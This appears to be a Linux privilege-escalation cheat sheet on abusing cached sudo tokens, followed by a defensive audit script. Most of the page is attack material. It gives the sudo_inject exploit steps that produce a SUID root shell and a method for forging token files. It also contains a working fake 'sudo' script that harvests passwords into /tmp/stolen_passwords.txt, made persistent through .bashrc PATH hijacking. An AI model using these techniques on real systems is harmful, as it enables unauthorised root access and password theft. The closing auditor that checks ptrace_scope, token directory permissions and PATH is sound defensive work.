Overview

After a user runs sudo and enters their password, sudo caches an authentication timestamp (the token), by default for 15 minutes. If you have code execution in that user's session, you can reuse the token without knowing the password.

Requirements

  • User is in the sudo group
  • User has recently used sudo (token not expired)
  • You have code execution as that user
  • /proc/sys/kernel/yama/ptrace_scope = 0 (process injection via ptrace allowed), or one of the variants below that does not need ptrace applies

Check ptrace_scope

cat /proc/sys/kernel/yama/ptrace_scope

Value  Meaning
0      Any process can ptrace any other process of the same user (exploitable)
1      Only a parent can ptrace its descendants
2      Only admin (CAP_SYS_PTRACE) can ptrace
3      No ptrace at all

Check Token Existence

ls -la /var/run/sudo/ts/
ls -la /var/run/sudo/ts/$(whoami)

sudo_inject

https://github.com/nongiach/sudo_inject

exploit.sh — Process Injection

Injects into a process owned by target user to activate sudo token:
./exploit.sh
Creates /tmp/sh — SUID shell:
/tmp/sh -p

exploit_v2.sh — No ptrace Required

Uses /proc/pid/mem instead of ptrace:
./exploit_v2.sh

exploit_v3.sh — Via Shared Library

Loads shared library into user process:
./exploit_v3.sh
/tmp/sh -p

Manual Token Abuse

Write sudo_inject Token

If you can write to /var/run/sudo/ts/<username>:
ls -la /var/run/sudo/ts/
If writable, create a valid token entry. The token format is binary — use write_sudo_token:
https://github.com/nongiach/sudo_inject/blob/master/extra_tools/write_sudo_token.c

gcc write_sudo_token.c -o write_sudo_token
./write_sudo_token
sudo su

Timestamp Directory Permissions

Default: /var/run/sudo/ts/ owned by root with 0700. If misconfigured (writable):
ls -la /var/run/sudo/
# drwxrwxrwx = exploitable

Sudo Timestamp Timeout

Check timeout:
sudo -l | grep timestamp
cat /etc/sudoers | grep timestamp_timeout
Default: 15 minutes. A negative value such as -1 means the token never expires (always exploitable if a token exists).

Sudo Hijacking (PATH)

Create a fake sudo in a writable directory that comes before /usr/bin in PATH:
cat > /tmp/sudo << 'EOF'
#!/bin/bash
/usr/bin/sudo -n true 2>/dev/null
if [ $? -eq 0 ]; then
    /usr/bin/sudo /bin/bash
else
    read -sp "[sudo] password for $(whoami): " pass
    echo "$pass" >> /tmp/stolen_passwords.txt
    echo "$pass" | /usr/bin/sudo -S "$@"
fi
EOF
chmod +x /tmp/sudo
export PATH=/tmp:$PATH
The next time the user types sudo, the fake one either reuses the cached token or captures the password.

Persistent via .bashrc

echo 'export PATH=/tmp:$PATH' >> ~/.bashrc

Quick Reference

Technique                    Requirement
sudo_inject (ptrace)         ptrace_scope = 0, active sudo token
sudo_inject v2 (/proc/mem)   /proc/pid/mem readable
Write sudo token             Writable /var/run/sudo/ts/
Sudo hijacking               Writable PATH dir, user runs sudo
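As an added defender-side example (not from the original page or the sudo_inject project), the following POSIX shell script audits the four preconditions in the quick reference: the ptrace_scope value, the mode of /var/run/sudo/ts, the sudoers timestamp_timeout, and writable PATH entries ahead of the real sudo. The function names are my own, and each check takes its input as an argument so it can be exercised on constructed values as well as on the live host.

```sh
#!/bin/sh
# Hypothetical audit helper (added here, not part of sudo_inject or the page above).
# Map a /proc/sys/kernel/yama/ptrace_scope value (0-3) to a risk label.
ptrace_scope_risk() {
  case "$1" in
    0) echo "HIGH: any same-uid process can attach; cached-token reuse by injection is possible" ;;
    1) echo "MEDIUM: a process can only attach to its own descendants (common default)" ;;
    2) echo "LOW: only processes with CAP_SYS_PTRACE can attach" ;;
    3) echo "LOW: ptrace is disabled until reboot" ;;
    *) echo "UNKNOWN: unexpected value '$1'" ;;
  esac
}

# Exit 0 when a sudoers timestamp_timeout keeps tokens alive longer than the
# 15-minute default, or forever (a negative value never expires).
timeout_is_risky() {
  whole=${1%.*}                      # drop fractional minutes: 5.5 -> 5
  case "$whole" in
    -*) return 0 ;;
    ''|*[!0-9]*) return 1 ;;         # not numeric: do not flag
  esac
  [ "$whole" -gt 15 ]
}

# Exit 0 when an octal mode string (700, 0777, as printed by 'stat -c %a')
# grants write to group or other: the misconfiguration of /var/run/sudo/ts.
ts_dir_is_writable_by_others() {
  perm=$(printf '%s' "$1" | tail -c 3)
  g=$(printf '%s' "$perm" | cut -c2)
  o=$(printf '%s' "$perm" | cut -c3)
  [ $(( g & 2 )) -ne 0 ] || [ $(( o & 2 )) -ne 0 ]
}

# Print PATH entries that precede the directory of the real sudo and are
# writable by the caller: a fake 'sudo' placed there shadows the real one.
hijackable_path_dirs() {
  printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
    [ "$dir" = "$2" ] && break
    [ -z "$dir" ] && dir=.           # an empty entry means the current directory
    [ -d "$dir" ] && [ -w "$dir" ] && printf '%s\n' "$dir"
  done
}

# Live run on this host; a probe is skipped when its source is absent.
[ -r /proc/sys/kernel/yama/ptrace_scope ] &&
  echo "ptrace_scope: $(ptrace_scope_risk "$(cat /proc/sys/kernel/yama/ptrace_scope)")"
mode=$(stat -c '%a' /var/run/sudo/ts 2>/dev/null) && ts_dir_is_writable_by_others "$mode" &&
  echo "WARNING: /var/run/sudo/ts mode $mode is writable by non-root"
sudo_bin=$(command -v sudo) && hijackable_path_dirs "$PATH" "${sudo_bin%/*}" |
  sed 's/^/WARNING: writable PATH entry ahead of sudo: /'
```

Feed timeout_is_risky the value from `grep timestamp_timeout /etc/sudoers` when you run it on a real host; the live section only probes the two filesystem-visible conditions and PATH.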